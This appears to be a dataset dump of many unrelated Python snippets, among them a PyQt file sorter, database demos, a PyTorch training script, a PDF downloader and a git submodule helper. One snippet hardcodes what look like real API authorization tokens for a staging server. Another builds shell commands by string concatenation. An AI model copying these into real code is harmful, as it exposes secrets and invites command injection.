text stringlengths 38 1.54M |
|---|
#!/usr/bin/env python
# -*- coding: utf-8 -*-
#
# lisa.py
#
# Copyright 2015 Arkadiy <arkadiy@arkadiy-SVE1511T1RW>
#
# This program is free software; you can redistribute it and/or modify
# it under the terms of the GNU General Public License as published by
# the Free Software Foundation; either version 2 of the License, or
# (at your option) any later version.
#
# This program is distributed in the hope that it will be useful,
# but WITHOUT ANY WARRANTY; without even the implied warranty of
# MERCHANTABILITY or FITNESS FOR A PARTICULAR PURPOSE. See the
# GNU General Public License for more details.
#
# You should have received a copy of the GNU General Public License
# along with this program; if not, write to the Free Software
# Foundation, Inc., 51 Franklin Street, Fifth Floor, Boston,
# MA 02110-1301, USA.
#
#
import os
import shutil
import time
import sys
from windows import Ui_MainWindow
from PyQt5.QtWidgets import *
from PyQt5.QtCore import *
from PyQt5.QtGui import *
import res
class Lisa_win(QMainWindow, Ui_MainWindow):
    """Main window: lets the user pick a directory and sort its files
    either by extension or by modification date (year/month folders).
    """

    def __init__(self):
        super().__init__()
        self.setupUi(self)
        self.setStyleSheet(open('style.qss').read())
        # Wire up buttons and menu actions.
        self.open_btn.clicked.connect(self.showDialog)
        self.actionOpen_Dir.triggered.connect(self.showDialog)
        self.actionExit.triggered.connect(exit)
        self.action_2.triggered.connect(self.help)
        self.actionAbout.triggered.connect(self.about)
        self.start_btn.clicked.connect(self.sorted)
        # Month/year options are hidden until show_options() is wired up.
        self.month_chb.setVisible(0)
        self.year_chb.setVisible(0)
        # self.date_rb.clicked.connect(self.show_options)
        # self.extens_rb.clicked.connect(self.show_options)

    def showDialog(self):
        """Ask the user for a directory and list its entries with icons."""
        self.progress_pg.setValue(0)
        dir_name = QFileDialog.getExistingDirectory(
            self, 'Open file')
        if not dir_name:
            # Dialog cancelled — nothing to show (the original hid this
            # case inside a bare `except: pass`).
            return
        try:
            list_files = os.listdir(dir_name)
        except OSError:
            # Unreadable directory: leave the UI unchanged instead of
            # silently swallowing every possible exception.
            return
        self.dir_name_le.setText(dir_name)
        self.list_files_lw.clear()
        for i in list_files:
            item = QListWidgetItem(i)
            if os.path.isdir(os.path.join(dir_name, i)):
                item.setIcon(QIcon(':/icons/icons/folder.png'))
            if os.path.isfile(os.path.join(dir_name, i)):
                item.setIcon(QIcon(':/icons/icons/file.png'))
            self.list_files_lw.addItem(item)

    def show_options(self):
        """Show the month/year checkboxes only for date-based sorting."""
        if self.date_rb.isChecked():
            self.month_chb.setVisible(1)
            self.year_chb.setVisible(1)
        else:
            self.month_chb.setVisible(0)
            self.year_chb.setVisible(0)

    def sorted(self):
        """Dispatch to the selected sort mode.

        NOTE: the method name shadows the builtin `sorted`; it is kept
        because the signal wiring in __init__ depends on it.
        """
        if self.extens_rb.isChecked() or self.date_rb.isChecked():
            self.list_files_lw.clear()
            directory = self.dir_name_le.text()
            self.start_btn.setEnabled(0)
            if directory:
                files = os.listdir(directory)
                # Guard against an empty directory: the original computed
                # 100 / len(files) unconditionally (ZeroDivisionError).
                step_pb = 100 / len(files) if files else 0
                if self.extens_rb.isChecked():
                    self.sort_by_ext(directory, files, step_pb)
                elif self.date_rb.isChecked():
                    self.sort_by_date(directory, files, step_pb)
                self.progress_pg.setValue(100)
                self.finish()
            else:
                # Re-enable the button — the original left it disabled
                # forever after this error path.
                self.start_btn.setEnabled(1)
                QMessageBox.question(
                    self, 'Message', "Please select directory to sort", QMessageBox.Ok)
        else:
            QMessageBox.question(
                self, 'Message', "Please select type sort", QMessageBox.Ok)

    def finish(self):
        """Re-enable the start button and tell the user we are done."""
        self.start_btn.setEnabled(1)
        QMessageBox.question(self, 'Message',
                             "All files sorted", QMessageBox.Ok)

    def help(self):
        QMessageBox.question(
            self, 'Help', 'This programm written Python3. Sorted your files in directory by date or extension.\nSorted by date: /home/user/downloads ==> /home/user/downloads/years/month\nExample: /home/user/download/2015/July\nType sorted extension: /home/user/downloads/pdf', QMessageBox.Ok)

    def about(self):
        QMessageBox.question(
            self, 'About author', 'This is GUI interface for Lisa - Programm sorted your files\nAuthor: Khorark\nEmail: khorark@gmail.com\nVerion: 1.01 - 2016.03.10', QMessageBox.Ok)

    def sort_by_ext(self, directory, files, step_pb):
        """Move every file with an extension into <directory>/<ext>/."""
        for i in files:
            ext = os.path.splitext(i)
            if ext[1] != '':
                dst_dir = os.path.join(directory, ext[1][1:])
                if not os.path.exists(dst_dir):
                    os.mkdir(dst_dir)
                shutil.move(os.path.join(directory, i),
                            os.path.join(dst_dir, i))
                print('{} ==> {}'.format(os.path.join(
                    directory, i), os.path.join(dst_dir, i)))
                self.list_files_lw.addItem('{} ==> {}'.format(os.path.join(
                    directory, i), os.path.join(dst_dir, i)))
            # setValue expects an int; the original accumulated a float
            self.progress_pg.setValue(
                int(self.progress_pg.value() + step_pb))

    def sort_by_date(self, directory, files, step_pb):
        """Move files into <directory>/<year>/<month>/ by mtime."""
        for i in files:
            abs_path = os.path.join(directory, i)
            if not os.path.isdir(abs_path):
                acc_time = time.gmtime(os.path.getmtime(abs_path))
                file_time_year = time.strftime('%Y', acc_time)
                file_time_month = time.strftime('%B', acc_time)
                dst_dir_year = os.path.join(directory, file_time_year)
                dst_dir_month = os.path.join(dst_dir_year, file_time_month)
                if not os.path.exists(dst_dir_year):
                    os.mkdir(dst_dir_year)
                if not os.path.exists(dst_dir_month):
                    os.mkdir(dst_dir_month)
                shutil.move(os.path.join(directory, i),
                            os.path.join(dst_dir_month, i))
                print('{} ==> {}'.format(
                    abs_path, os.path.join(dst_dir_month, i)))
                self.list_files_lw.addItem('{} ==> {}'.format(
                    abs_path, os.path.join(dst_dir_month, i)))
            self.progress_pg.setValue(
                int(self.progress_pg.value() + step_pb))

    def sort_by_year(self, directory, files, step_pb):
        # placeholder — not implemented
        pass

    def sort_by_month(self, directory, files, step_pb):
        # placeholder — not implemented
        pass
if __name__ == '__main__':
    # Standard Qt bootstrap: create the application, show the main
    # window, and enter the event loop.
    app = QApplication([])
    w = Lisa_win()
    w.show()
    app.exec_()
|
# Author: Emil
# Description: Body Mass Index Calculator using Imperial system

print("Hello, welcome to your Body Mass Index(BMI) Calculator!\n")

# Read height, re-prompting until a valid POSITIVE number is entered.
# (The original accepted 0 and negatives, which break the BMI formula.)
while True:
    try:
        height = float(input("Please enter your height here in inches: "))
        if height > 0:
            break
        print("Enter a valid positive number please")
    except ValueError:  # making sure user entered number correctly
        print("Enter a valid positive number please")

while True:
    try:
        weight = float(input("Please enter your weight here in pounds: "))
        if weight > 0:
            break
        print("Enter a valid positive number please")
    except ValueError:
        print("Enter a valid positive number please")

healthy = False  # to provide them relevant articles based on if they are healthy or not
bmi = weight / (height ** 2) * 703  # body mass index equation for imperial system
bmi = round(bmi, 2)  # rounds our bmi value to 2 decimal places
print("Your Body Mass Index is: ", bmi)

# Classify into the standard BMI bands.
if bmi <= 16:
    print("You're Severely Underweight")
elif bmi <= 18.5:
    print("You're Underweight")
elif bmi <= 25:
    print("You're Healthy!")
    healthy = True
elif bmi <= 30:
    print("You're Overweight")
else:
    print("You're Severely Overweight")

print("\nWhat's next? Check out these resources provided by the CDC and NIH for achieving that healthy lifestyle!\n")
if healthy:  # if user is in a healthy bmi, we'll provide links about maintaining that
    print("Maintaing that healthy weight: ")
    print("-> https://www.cdc.gov/healthyweight/prevention/index.html")
    print("-> https://www.nhlbi.nih.gov/heart-truth/maintain-a-healthy-weight")
else:  # if user is underweight or overweight, we'll provide resources on steps for them to try
    print("-> Achieving that Healthy Weight:https://www.cdc.gov/healthyweight/index.html")
    print("-> Physical Activity: https://www.nhlbi.nih.gov/heart-truth/increase-physical-activity")
    print("-> Healthy diet: https://www.nhlbi.nih.gov/heart-truth/eat-a-heart-healthy-diet")
print()
|
import cassandra
from cassandra.cluster import Cluster
# Demo: create a keyspace/table, insert two rows, then query them.
try:
    cluster = Cluster(['127.0.0.1'])  # If you have a locally installed Apache Cassandra instance
    session = cluster.connect()
except Exception as e:
    print(e)

try:
    # Single-node demo keyspace.
    session.execute("""
    CREATE KEYSPACE IF NOT EXISTS php_compute
    WITH REPLICATION =
    { 'class' : 'SimpleStrategy', 'replication_factor' : 1 }"""
    )
except Exception as e:
    print(e)

try:
    session.set_keyspace('php_compute')
except Exception as e:
    print(e)

# Partitioned by year, clustered by artist_name.
query = "CREATE TABLE IF NOT EXISTS music_php "
query = query + "(song_title text, artist_name text, year int, album_name text, single int, PRIMARY KEY (year, artist_name))"
try:
    session.execute(query)
except Exception as e:
    print(e)

query = "insert into music_php (song_title, artist_name, year, single, album_name)"
query = query + " VALUES (%s, %s, %s, %s, %s)"
try:
    session.execute(query, ("Across The Universe", "The Beatles", 1970, 0, "Let It Be"))
except Exception as e:
    print(e)
try:
    session.execute(query, ("Think For Yourself", "The Beatles", 1965, 0, "Rubber Soul"))
except Exception as e:
    print(e)

query = 'SELECT * FROM music_php'
rows = []  # fallback so the loop below is safe if the query fails
try:
    rows = session.execute(query)
except Exception as e:
    print(e)
for row in rows:
    print(row.year, row.album_name, row.artist_name)

# Fixed: the original selected from a nonexistent `songs` table and used
# double quotes around the string literal — CQL string literals take
# single quotes (double quotes denote identifiers).
query = "select * from music_php WHERE year=1970 AND artist_name='The Beatles'"
rows = []
try:
    rows = session.execute(query)
except Exception as e:
    print(e)
for row in rows:
    print(row.year, row.album_name, row.artist_name)

session.shutdown()
cluster.shutdown()
# |
from pymongo import MongoClient
import requests
import time
# Connect to the local MongoDB instance; `mvp` is the working database.
client = MongoClient('mongodb://localhost/', 27017)
DATABASE = client.mvp
# Topic names that double as collection names in `mvp`.
# NOTE(review): 'computers' and 'marketing' appear twice — presumably
# unintentional; duplicates cause repeated POSTs below. Verify.
lst = ['contracts','marketing', 'warranties', 'business_planning', 'conferences', 'computers', 'office_technology','electronics', 'regulations', 'correspondence',
       'computers', 'shopping', 'marketing', 'inventory', 'storage', 'hiring_and_training']
def get_document(table, query, order=None, distinct=None, page=None, limit=None, incre=-1):
    """Run `query` against collection `table` and return {"data": [...]}.

    order: field name to sort by (direction given by `incre`, default -1
        i.e. descending per pymongo convention).
    distinct: field to collapse results to distinct values of.
    page/limit: optional 1-based pagination (limit defaults to 20).
    Empty-string results are filtered out of the returned list.
    """
    if page:
        if not limit:
            limit = 20
        page = int(page)
        limit = int(limit)
        if order:
            res = DATABASE[table].find(query).sort(order, incre).skip((page-1)*limit).limit(limit)
        else:
            res = DATABASE[table].find(query).skip((page-1)*limit).limit(limit)
    else:
        if order:
            res = DATABASE[table].find(query).sort(order, incre)
        else:
            res = DATABASE[table].find(query)
    if distinct:
        res = res.distinct(distinct)
    # Drop empty-string entries (relevant after distinct()).
    res = filter(lambda r: r != '',res)
    # NOTE(review): `res` is a filter object here, which is always truthy
    # in Python 3 — the else branch below is dead code; list(res) already
    # yields [] when nothing matched.
    if res:
        message = {"data": list(res)}
    else:
        message = {"data": []}
    return message
def show_allcolection():
    """Return the names of all collections in the working database."""
    return [collection for collection in DATABASE.collection_names()]
def create_topic():
    """POST each topic name in `lst` to the staging /topics endpoint.

    NOTE(review): this function is redefined later in the file — that
    later definition shadows this one, so this body is never callable by
    name. Also note the Authorization header here lacks the "Token "
    prefix used by the later version — presumably stale; verify.
    """
    # url = "http://127.0.0.1:8000/topics"
    url = "https://toeic-essential-staging.herokuapp.com/topics"
    headers = {
        'Authorization': 'ec8f40cd6b7106f59475ff0a5f72e29c6dfc19b5'
    }
    for topic in lst:
        param = {'topic': topic}
        response = requests.post(url, data=param, headers=headers, timeout=17)
        print(response)
        # throttle requests to the staging server
        time.sleep(1)
def create_words():
    """POST every word document from each topic collection to /words.

    NOTE(review): redefined later in the file; that definition shadows
    this one, so this body is unreachable by name.
    """
    # url = "http://127.0.0.1:8000/words"
    url = "https://toeic-essential-staging.herokuapp.com/words"
    headers = {
        'Authorization': 'ec8f40cd6b7106f59475ff0a5f72e29c6dfc19b5'
    }
    query = {}
    # contrac = get_document('contracts', query)['data']
    # print(contrac[-1])
    for toipic in lst:  # (sic) "toipic" — kept as written
        contrac = get_document(toipic, query)['data']
        for word in contrac:
            print(word['key'], word['value'])
            param = {'word': word['key'],
                     'mean': word['value'],
                     'topic': toipic
                     }
            response = requests.post(url, data=param, headers=headers, timeout=17)
            print(response)
            # throttle requests to the staging server
            time.sleep(1)
    # for topic in lst:
    #     param = {'topic': topic}
    #     response = requests.post(url, data=param, headers=headers, timeout=17)
    #     print(response)
def create_topic():
    """POST each topic in `lst` (with a fixed level of 10) to /topics.

    This redefinition shadows the earlier create_topic above.
    """
    # url = "http://127.0.0.1:8000/topics"
    url = "https://toeic-essential-staging.herokuapp.com/topics"
    headers = {
        'Authorization': 'Token ec8f40cd6b7106f59475ff0a5f72e29c6dfc19b5'
    }
    query = {}
    # NOTE(review): `contrac` is fetched but never used here.
    contrac = get_document('contracts', query)['data']
    # print(contrac[-1])
    for toipic in lst:
        param = {'level': 10,
                 'topic': toipic
                 }
        response = requests.post(url, data=param, headers=headers, timeout=17)
        print(response)
        # time.sleep(1)
def get_all(table):
    """Fetch every document in `table`, skipping empty-string entries,
    and return them wrapped as {"data": [...]}.
    """
    documents = [doc for doc in DATABASE[table].find() if doc != '']
    return {"data": documents}
def create_data():
    """POST a drive-disable request, then dump 'contracts' documents.

    NOTE(review): `drive_id` is not defined anywhere in this file —
    calling this function raises NameError. Presumably it was meant to
    be a parameter; confirm against the caller before fixing.
    """
    url = "http://127.0.0.1:81/disable-drive"
    headers = {
        'Authorization': 'af4593ff029c48db8abc4363803278da',
        'Content-Type': 'application/json'
    }
    data = {
        'drive_id': drive_id
    }
    response = requests.post(url, data=data, headers=headers, timeout=7)
    query = {}
    # NOTE(review): this passes get_document's dict result back in as the
    # `table` argument — looks broken; the pattern elsewhere in this file
    # is get_document('contracts', query)['data']. Verify intent.
    for word in get_document(get_document('contracts', query)):
        print(word)
def create_words():
    """POST every 'contracts' word to /words once per topic in `lst`.

    This redefinition shadows the earlier create_words above. Unlike the
    earlier version, it reads only the 'contracts' collection and repeats
    the same words under every topic name.
    """
    url = "https://toeic-essential-staging.herokuapp.com/words"
    headers = {
        'Authorization': 'Token ec8f40cd6b7106f59475ff0a5f72e29c6dfc19b5'
    }
    query = {}
    contrac = get_document('contracts', query)['data']
    print(contrac[-1])
    for toipic in lst:
        for word in contrac:
            print(word['key'], word['value'])
            param = {'word': word['key'],
                     'mean': word['value'],
                     'topic': toipic
                     }
            response = requests.post(url, data=param, headers=headers, timeout=17)
            print(response)
            # throttle requests to the staging server
            time.sleep(1)
    # for topic in lst:
    #     param = {'topic': topic}
    #     response = requests.post(url, data=param, headers=headers, timeout=17)
    #     print(response)
if __name__ == '__main__':
    # Ad-hoc driver: uncomment the call you want to run.
    # create_data()
    # print(show_allcolection())
    # query = {}
    # print(get_document('contracts', query)['data'])
    # print(create_topic())
    print(create_words())
|
from django.contrib import admin
from models import Artist, Art
admin.site.register(Artist)


class ArtAdmin(admin.ModelAdmin):
    """Admin options for Art: auto-fill slug from the name field."""
    prepopulated_fields = {'slug': ('name',)}


# Register Art WITH its ModelAdmin — the original registered Art without
# ArtAdmin, so prepopulated_fields never took effect.
admin.site.register(Art, ArtAdmin)
import math
q = 0.9
def left(M, N):
    """Left-hand side of the inequality being searched: a Stirling-style
    log term plus a small correction term.
    """
    log_part = (M - N + 0.5) * math.log(M / (M - N))
    correction = 1 / (12 * M + 1) - 1 / (12 * (M - N))
    return log_part + correction
def right(N):
    """Right-hand side of the inequality: N plus ln of the module-level
    constant q.
    """
    return math.log(q) + N
# For each power of two N = 2**i, increase M = 2**j (starting at j = i+1)
# until left(M, N) exceeds right(N), printing intermediate values, then
# report the crossing exponent j for that i.
for i in range(65):
    N = 2 ** i
    j = i + 1
    M = 2 ** j
    while left(M, N) <= right(N):
        print(left(M, N), right(N))
        j += 1
        M = 2 ** j
    print(i, j)
|
from global_var import db
class Customer(db.Model):
    """SQLAlchemy model for a customer account."""
    __tablename__ = 'Customer'

    # Login name doubles as the primary key.
    username = db.Column(db.String(32), primary_key=True)
    name = db.Column(db.String(32), nullable=False)
    # Stored password (128 chars — presumably a hash; verify).
    password = db.Column(db.String(128), nullable=False)
    phone_number = db.Column(db.String(20), nullable=False)
    age = db.Column(db.Integer)
    gender = db.Column(db.String(20))
    ID_number = db.Column(db.String(80), unique=True)
    # Membership tier; attribute name shadows the builtin `type` but is
    # kept because it maps to the column name.
    type = db.Column(db.String(20), default="NO-VIP")
|
### YOUR CODE HERE
# import tensorflow as tf
import torch
import os, argparse
import numpy as np
#from Model_SWA import MyModel
from Model import MyModel
from DataLoader import load_data, train_valid_split, load_testing_images
from Configure import model_configs, training_configs
import utils
# Command line: two required positionals (mode, data_dir) plus optional
# checkpoint/save-path flags. Parsed at import time.
parser = argparse.ArgumentParser()
parser.add_argument("mode", help="train, test or predict")
parser.add_argument("data_dir", help="path to the data")
parser.add_argument("--save_dir", help="path to save the results")
parser.add_argument("--resume_checkpoint", help=".pth checkpoint file to resume")
parser.add_argument("--checkpoint", help=".pth checkpoint file to use for evaluation")
args = parser.parse_args()
# Prefer GPU when available.
device = 'cuda' if torch.cuda.is_available() else 'cpu'
if __name__ == '__main__':
    model = MyModel(model_configs)
    if args.mode == 'train':
        print('----- training mode ----')
        # Augment the train data per config; `test` is only used to track
        # performance during training.
        train, test, orig_trainset = load_data(args.data_dir, train_aug=training_configs['train_augmentation'])
        train, valid = train_valid_split(train, orig_trainset, train_ratio=1)
        if args.resume_checkpoint is not None:
            checkpoint = torch.load('../saved_models/' + args.resume_checkpoint)
            epoch, accuracy_type, prev_accuracy = (checkpoint[k] for k in ['epoch', 'accuracy_type', 'accuracy'])
            print('RESUME---> Loading model from Epoch %d with %s Accuracy %f' % (epoch, accuracy_type, prev_accuracy))
        else:
            checkpoint = None
        model.train(train, training_configs, valid=None, test=test, checkpoint=checkpoint)
        model.evaluate(test)
    elif args.mode == 'test':
        # Testing on public testing dataset.
        _, test, _ = load_data(args.data_dir, None)
        if args.checkpoint is None:
            # Fixed: the original did `raise('...')`, which raises
            # TypeError (a str is not an exception class/instance).
            raise ValueError('No Checkpoint file specified! Specify one with --checkpoint')
        checkpoint = torch.load('../saved_models/' + args.checkpoint)
        print('Loading Model--->')
        model.network.load_state_dict(checkpoint['net'])
        test_accuracy, correct, total = model.evaluate(test)
        # Fixed typo in the results message ("Correctt").
        print("[%s%s test results] Model Accuracy %f, Total Correct %d, Total Test Samples %d"
              % (args.checkpoint, utils.get_time(), test_accuracy, correct, total))
    elif args.mode == 'predict':
        print('----- predict mode ----')
        # Predicting and storing results on private testing dataset.
        x_test = load_testing_images(args.data_dir)
        if args.checkpoint is None:
            raise ValueError('No Checkpoint file specified! Specify one with --checkpoint')
        checkpoint = torch.load('../saved_models/' + args.checkpoint)
        print('Loading Model--->')
        model.network.load_state_dict(checkpoint['net'])
        predictions = model.predict_prob(x_test)
        # Join with os.path.join so a save_dir without a trailing slash
        # still produces a valid path (original used raw concatenation).
        np.save(os.path.join(args.save_dir, args.checkpoint + "predictions.npy"), predictions)
    else:
        print('[Error] No Mode Selected')
    print('bye')
### END CODE HERE
|
# MAC address of each network interface, keyed by interface name.
INTERFACE_MACS = {
    'eth0': 0x00e0ed0bdc2a,
    'eth1': 0x00e0ed0bdc2b,
    'eth2': 0x00e0ed0bdc2c,
    'eth3': 0x00e0ed0bdc2d,
    'eth6': 0x00e0ed11c7f7,
    'eth7': 0x00e0ed11c7f6,
    'eth8': 0x00e0ed11c7f5,
    'eth9': 0x00e0ed11c7f4
}
# Interface that receives traffic.
RX_INTERFACE = 'eth7'
# Interfaces that transmit.
TX_INTERFACES = ['eth0', 'eth1', 'eth2', 'eth3', 'eth6', 'eth8', 'eth9']
# NOTE(review): identifier misspells "MIRRORED"; renaming would break
# any external references, so it is documented rather than changed.
MIRORRED_INTERFACES = ['eth0']
from matplotlib import pyplot
# Minimal matplotlib smoke test: create a figure, clear it, draw the
# identity line through (1,1)-(3,3), and show the window (blocking).
figure = pyplot.figure()
figure.clf()
pyplot.plot([1, 2, 3], [1, 2, 3])
pyplot.show()
import logging
import os
import urllib.request, urllib.parse, urllib.error
import copy
from urllib.parse import urlparse
from django.conf import settings
LOGGER = logging.getLogger(__name__)
def get_jupyter_url(system, path, username, is_dir=False):
    """Build a Jupyter URL for a file or directory on an agave system.

    Requires the PORTAL_JUPYTER_URL and PORTAL_JUPYTER_SYSTEM_MAP
    settings. Returns None when the user is anonymous, the settings are
    missing, or the system is not mapped to a Jupyter mount point.

    Args:
        system: agave system id
        path: file or directory path on that system
        username: current user (None for anonymous)
        is_dir: True if `path` is a directory

    Returns:
        URL string for viewing notebooks (/notebooks), editing text
        files (/edit) or listing directories (/tree), or None.
    """
    if username is None:
        return None

    portal_jupyter_url = getattr(settings, 'PORTAL_JUPYTER_URL', None)
    portal_jupyter_system_map = getattr(settings, 'PORTAL_JUPYTER_SYSTEM_MAP', None)
    if portal_jupyter_url is None or portal_jupyter_system_map is None:
        LOGGER.warning('No Jupyter URL or Jupyter System Map found.')
        return None

    # Expand "{username}" placeholders in both keys and values of the
    # configured system -> mount point map.
    def expand(text):
        return text.replace("{username}", username)

    system_map = {expand(key): expand(val)
                  for key, val in portal_jupyter_system_map.items()}

    # The requested system must be configured to a Jupyter mount point.
    if system not in system_map:
        LOGGER.warning(
            'System \'%s\' not found in Jupyter System Map.',
            system
        )
        return None

    # Choose the Jupyter action: directory listing, notebook, or editor.
    if is_dir:
        action = "/tree"
    elif os.path.splitext(path)[1] == ".ipynb":
        action = "/notebooks"
    else:
        action = "/edit"

    return "{portal_jupyter_url}/user/{username}{action}{system}{path}".format(
        portal_jupyter_url=portal_jupyter_url,
        username=username,
        action=action,
        system=system_map[system],
        path=path
    )
def _quote_input_url(raw):
    """URL-quote the path component of one input value.

    Preserves an existing scheme://netloc prefix; scheme-less values are
    returned as just the quoted path.
    """
    parsed = urlparse(raw)
    quoted_path = urllib.parse.quote(parsed.path)
    if parsed.scheme:
        return '{}://{}{}'.format(parsed.scheme, parsed.netloc, quoted_path)
    return quoted_path


def url_parse_inputs(job):
    """
    Translates the inputs of an Agave job to be URL encoded.

    Returns a deep copy of `job`; the original dict is not mutated.
    Each value of job['inputs'] is either a string or a list of strings.

    Fixes vs. the original: the list branch now applies the same
    scheme check as the string branch (it used to emit "://path" for
    scheme-less entries), and the loop no longer shadows the builtin
    `input`.
    """
    job = copy.deepcopy(job)
    for key, value in job['inputs'].items():
        if isinstance(value, str):
            job['inputs'][key] = _quote_input_url(value)
        else:
            # A list of input URLs: encode each element.
            job['inputs'][key] = [_quote_input_url(item) for item in value]
    return job
|
# Base class for animals: stores weight and size, with a no-op
# locomotion method for subclasses to override.
class Animal:
    def __init__(self, poids, taille):
        self.animal_poids = poids
        self.animal_taille = taille

    def se_deplacer(*args):
        # Default locomotion: does nothing; subclasses print how they move.
        pass
# Subclasses Serpent (snake) and Oiseau (bird) of Animal.
class Serpent(Animal):
    def se_deplacer(*args):
        # "Je rampe" = "I crawl"
        print("Je rampe")
# Uses super() to extend Animal.__init__ with an extra
# altitude_max argument.
class Oiseau(Animal):
    def __init__(self, poids, taille, altitude_max):
        super().__init__(poids, taille)
        self.oiseau_altitude_max = altitude_max

    def se_deplacer(*args):
        # "Je vole" = "I fly"
        print("Je vole")
# Quick demo: build an eagle with max altitude 1000 and print it.
y = 1000
aigle = Oiseau(12, 18, y)
print(aigle.oiseau_altitude_max)
|
import subprocess
import os, sys
import getopt
BASE_DIR = os.path.dirname(os.path.dirname(__file__))
def common_clear(submodule_directory, version):
    """Check out `version` inside the submodule directory and stage the
    submodule pointer change in the parent repo (commit/push disabled).
    """
    dr = submodule_directory
    os.chdir(dr)
    os.system("git checkout " + version)
    # back to the parent repository
    os.chdir("..")
    os.system('git add ' + submodule_directory)
    #os.system('git commit -m "moved ' + submodule_directory + ' to ' + version + '"')
    #os.system('git push')
# NOTE: Python 2 script (print statements).
if __name__ == '__main__':
    """ change commands and add shell"""
    # Each entry: [shell command that adds the submodule, branch/tag to
    # check out inside it afterwards].
    commands_kids = [
        ["git submodule add ssh://192.168.0.121:29418/~wusonglin/common_ts.git common", 'master'],
    ]
    tag = 'kids'
    try:
        opt, args = getopt.getopt(sys.argv[1:], "ht:", ['tag', 'help'])
        for op, value in opt:
            if op in ("-t", "--tag"):
                tag = value
            if op in ("-h", "--help"):
                print "Usage: GitSubmodule.py -t TAG_NAME"
                print "Options:"
                print " -t TAG_NAME.Choose what you want to use tag, should be [kids | nonkids],if no input args, kids is the default."
                print ""
                print "Sample 1: ./GitSubmodule.py -t kids"
                print "Sample 2: ./GitSubmodule.py -t nonkids"
                print ""
                sys.exit()
    except getopt.GetoptError:
        print "Error: Could not find the args."
        print "Usage: GitSubmodule.py -t TAG_NAME"
        print "Options:"
        print " -t TAG_NAME.Choose what you want to use tag, should be [kids | nonkids],if no input args, kids is the default."
        print ""
        print "Sample 1: ./GitSubmodule.py -t kids"
        print "Sample 2: ./GitSubmodule.py -t nonkids"
        print ""
        sys.exit()
    if tag.lower() in ['kids', 'nonkids']:
        tag = tag.lower()
    else:
        print "Only one args must be 'kids' or 'nonkids'"
        exit()
    # NOTE(review): both branches assign commands_kids — the 'nonkids'
    # command list appears to be missing; confirm intent.
    if tag == 'kids':
        commands = commands_kids
    else:
        commands = commands_kids
    print commands
    for cmd in commands:
        # Run the submodule-add command, streaming its stdout line by line.
        p = subprocess.Popen(cmd[0], stdout=subprocess.PIPE, env=os.environ, shell=True)
        while True:
            line = p.stdout.readline()
            if not line:
                break
            print line
        err = p.wait()
        if err != 0:
            print "error shell: ", cmd, "git submodule failed"
        # Check out the requested version inside the new submodule dir
        # (last whitespace-separated token of the command is the dir).
        common_clear(cmd[0].split(' ')[-1], cmd[1])
import os
import sys
import getopt
from time import sleep
import io
import requests
import html
from urllib import parse
# Browser-like User-Agent so the server does not reject the requests.
headers = {'User-Agent': 'Mozilla/5.0 (Macintosh; Intel Mac OS X 10_10_1) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/39.0.2171.95 Safari/537.36'}
# Defaults; all three are overridable via -i/-o/-b below.
inputfile = "links2.txt"
outdir = "../data_monsanto/2018-03-29"
baseurl = "http://baumhedlundlaw.com/pdf/monsanto-documents/"


def usage(exitCode=0):
    """Print the command-line synopsis and exit with `exitCode`."""
    print('download.py [-i <infile>] [-o <outdir>] [-b <baseurl>] [-h]')
    sys.exit(exitCode)
argv = sys.argv[1:]  # first arg is filename
try:
    opts, args = getopt.getopt(argv, "hi:o:b:", ["help", "inputfile=", "outdir=", "baseurl="])
except getopt.GetoptError:
    usage(exitCode=2)
for opt, arg in opts:
    if opt in ("-h", "--help"):
        usage(exitCode=0)
    elif opt in ("-i", "--inputfile"):
        inputfile = arg
    elif opt in ("-o", "--outdir"):
        outdir = arg
    elif opt in ("-b", "--baseurl"):
        baseurl = arg
# urljoin below treats a base without a trailing slash differently.
if len(baseurl) > 0 and baseurl[-1] != '/':
    print("Warning, baseurl does not end with a '/', this is probably not what you want")
# f = io.open(inputfile, 'r', encoding='utf8')
# url = f.readline()
# url
# f.close()
notHandled = []
count = 0
with io.open(inputfile, 'r', encoding='utf8') as f:
    for url in f:
        # NOTE(review): [:-1] assumes every line ends with '\n'; a final
        # line without one loses its last character — rstrip('\n') would
        # be safer. Confirm the input file format.
        url = url[:-1]  # strip \n
        if not url.endswith(".pdf"):
            print("url was not for a pdf document: " + url)
            notHandled.append(url)
            continue
        url = html.unescape(url)  # convert html entities (&amp;)
        url = parse.unquote_plus(url)  # convert url encoding (%20)
        url = parse.urljoin(baseurl, url)
        index = url.rfind("/")  # reverse find
        filename = os.path.join(outdir, url[index + 1:])  # index+1 works even if index=-1 :)
        # filename becomes loaded with potential weird characters, probably a problem on windows
        response = requests.get(url, headers=headers)
        if response.status_code != 200:
            raise Exception("wrong status_code {} ".format(response.status_code) + url)
        with io.open(filename, 'wb') as outfile:
            outfile.write(response.content)
        count += 1
        if count % 5 == 0:
            # periodic progress report + polite throttle
            print("{}".format(count))
        sleep(0.75)
for url in notHandled:
    print("Not downloaded: " + url)
print("Done. Downloaded {}".format(count))
|
# 树的子结构
# 输入两棵二叉树A,B,判断B是不是A的子结构。
class node:
    """Binary tree node used to test whether another tree (B) occurs as
    a substructure of this tree (A)."""

    def __init__(self, s):
        self.s = s          # node label
        self.left = None    # left child (node or None)
        self.right = None   # right child (node or None)

    def search(self, target):
        """Return 1 if `target`'s tree matches a substructure anchored
        somewhere in this tree, else 0.

        When the labels match, the match is anchored here and must follow
        target's shape; otherwise the search descends into the children.

        Bug fixed vs. the original: the anchored comparison dereferenced
        self.left / self.right without None checks, raising
        AttributeError whenever `target` had a child this node lacked —
        that case now correctly counts as "no match" (0).
        """
        if self.s == target.s:
            # Anchored structural comparison against target.
            if target.left is None and target.right is None:
                return 1
            if target.left is None:
                return self.right.search(target.right) if self.right is not None else 0
            if target.right is None:
                return self.left.search(target.left) if self.left is not None else 0
            if self.left is not None and self.right is not None:
                return self.right.search(target.right) & self.left.search(target.left)
            return 0
        # Labels differ: keep looking for an anchor among the children.
        if self.left is None and self.right is None:
            return 0
        if self.left is not None and self.right is not None:
            return self.left.search(target) | self.right.search(target)
        if self.left is None:
            return self.right.search(target)
        return self.left.search(target)
# Build tree A:        a
#                     / \
#                    b   c
#                   /|   |\
#                  d e   f g
first = node('a')
second1 = node('b')
second2 = node('c')
second1.left = node('d')
second1.right = node('e')
second2.left = node('f')
second2.right = node('g')
first.right = second2
first.left = second1
# Tree B is the c/f/g subtree — expect the search to report 1.
test = node('c')
test.right = node('g')
test.left = node('f')
print(first.search(test))
|
from pygame import key, K_LEFT, K_RIGHT
from pygame.sprite import Group
from base import GameSprite
from constants import BULLET_IMG_PATH
